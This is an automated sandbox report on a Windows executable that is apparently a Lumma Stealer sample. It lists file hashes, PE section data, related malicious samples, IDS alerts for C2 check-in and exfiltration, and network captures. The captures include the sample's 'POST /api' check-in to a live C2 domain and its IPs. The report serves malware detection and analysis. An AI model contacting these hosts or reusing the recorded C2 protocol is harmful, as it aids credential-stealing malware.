                                                                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3XM6cn2uNux.exe, 00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3492521129.0000000001262000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?XM6cn2uNux.exe, 00000000.00000003.2777491421.0000000005A41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://support.mozilla.org/products/firefoxgro.allXM6cn2uNux.exe, 00000000.00000003.2778902888.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=XM6cn2uNux.exe, 00000000.00000003.2246076872.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2246183178.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.mozilla.orXM6cn2uNux.exe, 00000000.00000003.2778602554.0000000005A3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaXM6cn2uNux.exe, 00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3492521129.0000000001262000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.165.185 | mindhandru.buzz | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1580875
Start date and time: 2024-12-26 12:44:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 17s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: XM6cn2uNux.exe (renamed because the original name is a hash value)
Original Sample Name: a3f5c08ac61228829905f46d3e4e9dc5.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 6
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.198.118.190, 20.190.177.83, 20.199.58.43, 2.16.158.74, 13.107.246.63, 4.175.87.197, 20.223.35.26, 150.171.27.10, 2.16.158.48, 23.218.208.109
• Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com, wns.notify.trafficmanager.net, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com
• Execution Graph export aborted for target XM6cn2uNux.exe, PID 5448 because there are no executed functions
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
06:45:14 | API Interceptor | 4834314x Sleep call for process: XM6cn2uNux.exe modified
Match: 172.67.165.185
Associated Sample Name / URL | Detection | Threat Name
rwFNJ4pHWG.exe | malicious | LummaC
dEugughckk.exe | malicious | LummaC
Solara-v3.0.exe | malicious | LummaC
https://click.jipolismall.de/i86/ | malicious | Unknown
https://ser.optimalesi.de/i87/ | malicious | Unknown
https://ser.optimalesi.de/i68 | malicious | Unknown
https://cpanel.vivatell.de/i105/ | malicious | Unknown
https://cpanel.vivatell.de/i105/ | malicious | Unknown
https://out.novastellz.de/i45/ | malicious | Unknown
Match: fp2e7a.wpc.phicdn.net
Associated Sample Name / URL | Detection | Threat Name | Context
bG89JAQXz2.exe | malicious | LummaC | 192.229.221.95
q8b3OisMC4.dll | malicious | Unknown | 192.229.221.95
eszstwQPwq.ps1 | malicious | LockBit ransomware, Metasploit | 192.229.221.95
0vM02qWRT9.ps1 | malicious | LockBit ransomware, Metasploit | 192.229.221.95
30136156071477318040.js | malicious | Unknown | 192.229.221.95
BJQizQ6sqT.exe | malicious | LummaC | 192.229.221.95
6vNMeuQvlu.exe | malicious | Clipboard Hijacker, Cryptbot | 192.229.221.95
2ZsJ2iP8Q2.exe | malicious | LummaC | 192.229.221.95
BVGvbpplT8.exe | malicious | LummaC, Stealc | 192.229.221.95
mgEXk8ip26.exe | malicious | LummaC | 192.229.221.95

Match: mindhandru.buzz
Associated Sample Name / URL | Detection | Threat Name | Context
ZX2M0AXZ56.exe | malicious | LummaC | 104.21.11.101
0Pm0sadcCP.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.11.101
TTsfmr1RWm.exe | malicious | LummaC | 104.21.11.101
COBYmpzi7q.exe | malicious | LummaC | 104.21.11.101
rwFNJ4pHWG.exe | malicious | LummaC | 172.67.165.185
lBsKTx65QC.exe | malicious | LummaC | 104.21.11.101
dEugughckk.exe | malicious | LummaC | 172.67.165.185
Solara-v3.0.exe | malicious | LummaC | 172.67.165.185
Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
ZX2M0AXZ56.exe | malicious | LummaC | 104.21.11.101
6GNqkkKY0j.exe | malicious | LummaC | 172.67.157.254
0Pm0sadcCP.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.11.101
TTsfmr1RWm.exe | malicious | LummaC | 104.21.11.101
COBYmpzi7q.exe | malicious | LummaC | 104.21.11.101
rwFNJ4pHWG.exe | malicious | LummaC | 172.67.165.185
Ebgl8jb6CW.exe | malicious | LummaC | 172.67.157.254
lBsKTx65QC.exe | malicious | LummaC | 104.21.11.101
35K4Py4lii.exe | malicious | LummaC | 104.21.66.86
dEugughckk.exe | malicious | LummaC | 172.67.165.185
Match: a0e9f5d64349fb13191bc781f81f42e1
Associated Sample Name / URL | Detection | Threat Name | Context
ZX2M0AXZ56.exe | malicious | LummaC | 172.67.165.185
6GNqkkKY0j.exe | malicious | LummaC | 172.67.165.185
0Pm0sadcCP.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 172.67.165.185
TTsfmr1RWm.exe | malicious | LummaC | 172.67.165.185
COBYmpzi7q.exe | malicious | LummaC | 172.67.165.185
rwFNJ4pHWG.exe | malicious | LummaC | 172.67.165.185
Ebgl8jb6CW.exe | malicious | LummaC | 172.67.165.185
lBsKTx65QC.exe | malicious | LummaC | 172.67.165.185
35K4Py4lii.exe | malicious | LummaC | 172.67.165.185
dEugughckk.exe | malicious | LummaC | 172.67.165.185

No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.9475387224526335
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: XM6cn2uNux.exe
File size: 1'887'232 bytes
MD5: a3f5c08ac61228829905f46d3e4e9dc5
SHA1: f412251760048ed7d1f078fa3de654fe8c52262c
SHA256: 2791569a37e501f3c7b0c74aa2a75adaf30a07852c13e0f9d0fc658a948fe8c7
SHA512: 890c20f4f1dce61a8988ac2748ac2c71f4a20c93591e7688888ea86e89308423c5fcaebba42a0603c4dd765b551c84abc00684f7fcf533c25d0c3752bc0d76d2
SSDEEP: 24576:eC5y9GEODNMe7cJkVsnbzGgE0WC5cNsEKdNVhp2N00Rqk322F3JN98B8Mqv24idz:Ty0FRpAhxBW/zuNVn2C0RqkNF3ie/G7
TLSH: E99533531E0AC2B5E899A0F3D5DE26913238E9D6BDFA0FAC0C01F46AD96F7650DB141C
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig.............................PJ...........@...........................J...........@.................................Y@..m..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x8a5000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:6
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:6
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:6
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x54059 | 0x6d | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x53000 | 0x1ac | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x541f8 | 0x8 | .idata |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| | 0x1000 | 0x52000 | 0x26400 | 66914215f7e6253acf7eb9c9ecdc74bb | False | 0.9995659722222222 | data | 7.9847234008770345 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x53000 | 0x1ac | 0x200 | c4249243ceaeb236e3ce8ce2ab2c9a69 | False | 0.5390625 | data | 5.249019796122045 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x54000 | 0x1000 | 0x200 | 39a711a7d804ccbc2a14eea65cf3c27e | False | 0.154296875 | data | 1.0789976601211375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| | 0x55000 | 0x2ac000 | 0x200 | 32220582459c7d1f126bdbc19fb3155a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| nfuikskw | 0x301000 | 0x1a3000 | 0x1a2a00 | 9f5fd6e8057db73a84bf47221cf1e144 | False | 0.9946649186324276 | data | 7.953324475907689 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| uavdauvr | 0x4a4000 | 0x1000 | 0x600 | 66a6ea80dcd50e9d3becc874ffab4d89 | False | 0.5533854166666666 | data | 4.908482209746096 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0x4a5000 | 0x3000 | 0x2200 | 5c535d2bd8af3060e1f0184c0f90eb12 | False | 0.06318933823529412 | DOS executable (COM) | 0.8181446851419909 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_MANIFEST | 0x53058 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402 |
| DLL | Import |
|---|---|
| kernel32.dll | lstrcpy |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-26T12:45:12.336203+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49714 | 172.67.165.185 | 443 | TCP |
| 2024-12-26T12:45:15.142184+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49714 | 172.67.165.185 | 443 | TCP |
| 2024-12-26T12:45:15.142184+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49714 | 172.67.165.185 | 443 | TCP |
| 2024-12-26T12:45:16.458009+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49720 | 172.67.165.185 | 443 | TCP |
| 2024-12-26T12:45:17.258145+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.6 | 49720 | 172.67.165.185 | 443 | TCP |
| 2024-12-26T12:45:17.258145+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49720 | 172.67.165.185 | 443 | TCP |
| 2024-12-26T12:45:19.228606+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49736 | 172.67.165.185 | 443 | TCP |
| 2024-12-26T12:45:27.250374+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.6 | 49736 | 172.67.165.185 | 443 | TCP |
| 2024-12-26T12:45:28.698182+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49760 | 172.67.165.185 | 443 | TCP |
| 2024-12-26T12:46:10.836888+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.6 | 49760 | 172.67.165.185 | 443 | TCP |
| 2024-12-26T12:46:12.433761+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49860 | 172.67.165.185 | 443 | TCP |
| 2024-12-26T12:47:22.368235+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.6 | 49860 | 172.67.165.185 | 443 | TCP |
| 2024-12-26T12:47:24.388227+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50006 | 172.67.165.185 | 443 | TCP |
| 2024-12-26T12:47:26.599901+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50007 | 172.67.165.185 | 443 | TCP |
| 2024-12-26T12:47:28.145167+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50008 | 172.67.165.185 | 443 | TCP |
                                                                                                            Dec 26, 2024 12:45:17.380264997 CET49720443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:17.380285025 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:17.430185080 CET49720443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:17.468435049 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:17.472248077 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:17.472311020 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:17.472419024 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:17.472492933 CET49720443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:17.594048023 CET49720443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:17.594096899 CET44349720172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:17.920731068 CET49736443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:17.920753002 CET44349736172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:17.920936108 CET49736443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:17.921264887 CET49736443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:17.921278000 CET44349736172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:19.228142977 CET44349736172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:19.228605986 CET49736443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:19.229696989 CET49736443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:19.229705095 CET44349736172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:19.230192900 CET44349736172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:19.232146978 CET49736443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:19.232323885 CET49736443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:19.232346058 CET44349736172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:27.250349998 CET44349736172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:27.250463009 CET44349736172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:27.250534058 CET49736443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:27.250834942 CET49736443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:27.250849009 CET44349736172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:27.393951893 CET49760443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:27.394006968 CET44349760172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:27.394076109 CET49760443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:27.394404888 CET49760443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:27.394419909 CET44349760172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:28.698107004 CET44349760172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:28.698182106 CET49760443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:28.700061083 CET49760443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:28.700077057 CET44349760172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:28.700315952 CET44349760172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:28.701997042 CET49760443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:28.702140093 CET49760443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:28.702172041 CET44349760172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:45:28.702230930 CET49760443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:45:28.743344069 CET44349760172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:46:10.836560011 CET49760443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:46:11.125014067 CET49860443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:46:11.125066996 CET44349860172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:46:11.125375986 CET49860443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:46:11.126271009 CET49860443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:46:11.126286030 CET44349860172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:46:12.433682919 CET44349860172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:46:12.433760881 CET49860443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:46:12.435704947 CET49860443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:46:12.435730934 CET44349860172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:46:12.436161995 CET44349860172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:46:12.438121080 CET49860443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:46:12.438374043 CET49860443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:46:12.438425064 CET44349860172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:46:12.438529968 CET49860443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:46:12.438545942 CET44349860172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:22.368225098 CET44349860172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:22.368324995 CET44349860172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:22.368592024 CET49860443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:22.369415045 CET49860443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:22.369437933 CET44349860172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:23.067842960 CET50006443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:23.067904949 CET44350006172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:23.067975998 CET50006443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:23.068305016 CET50006443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:23.068326950 CET44350006172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:24.388107061 CET44350006172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:24.388226986 CET50006443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:24.389730930 CET50006443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:24.389744043 CET44350006172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:24.390245914 CET44350006172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:24.426728010 CET50006443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:24.426866055 CET44350006172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:24.428611040 CET44350006172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:24.431044102 CET50006443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:24.431044102 CET50006443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:25.294482946 CET50007443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:25.294538021 CET44350007172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:25.294605970 CET50007443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:25.295027971 CET50007443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:25.295043945 CET44350007172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:26.599760056 CET44350007172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:26.599900961 CET50007443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:26.601742983 CET50007443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:26.601754904 CET44350007172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:26.602071047 CET44350007172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:26.603328943 CET50007443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:26.603367090 CET44350007172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:26.603518963 CET44350007172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:26.603549957 CET50007443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:26.603950977 CET50007443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:26.837568998 CET50008443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:26.837621927 CET44350008172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:26.837699890 CET50008443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:26.839277029 CET50008443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:26.839302063 CET44350008172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:28.144210100 CET44350008172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:28.145167112 CET50008443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:28.148772955 CET50008443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:28.148782969 CET44350008172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:28.149215937 CET44350008172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:28.180771112 CET50008443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:28.180861950 CET44350008172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:28.181072950 CET44350008172.67.165.185192.168.2.6
                                                                                                            Dec 26, 2024 12:47:28.183362961 CET50008443192.168.2.6172.67.165.185
                                                                                                            Dec 26, 2024 12:47:28.183362961 CET50008443192.168.2.6172.67.165.185
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 26, 2024 12:45:10.875790119 CET | 54013 | 53 | 192.168.2.6 | 1.1.1.1
Dec 26, 2024 12:45:11.017569065 CET | 53 | 54013 | 1.1.1.1 | 192.168.2.6

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 26, 2024 12:45:10.875790119 CET | 192.168.2.6 | 1.1.1.1 | 0x9f21 | Standard query (0) | mindhandru.buzz | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 26, 2024 12:45:06.839492083 CET | 1.1.1.1 | 192.168.2.6 | 0x9cff | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 26, 2024 12:45:06.839492083 CET | 1.1.1.1 | 192.168.2.6 | 0x9cff | No error (0) | fp2e7a.wpc.phicdn.net | - | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:45:11.017569065 CET | 1.1.1.1 | 192.168.2.6 | 0x9f21 | No error (0) | mindhandru.buzz | - | 172.67.165.185 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 12:45:11.017569065 CET | 1.1.1.1 | 192.168.2.6 | 0x9f21 | No error (0) | mindhandru.buzz | - | 104.21.11.101 | A (IP address) | IN (0x0001) | false

• mindhandru.buzz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49714 | 172.67.165.185 | 443 | 5448 | C:\Users\user\Desktop\XM6cn2uNux.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-26 11:45:12 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: mindhandru.buzz
2024-12-26 11:45:12 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-26 11:45:15 UTC | 1126 | IN | HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 11:45:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ngcn03lp14gpq520pa5vqileq0; expires=Mon, 21 Apr 2025 05:31:53 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
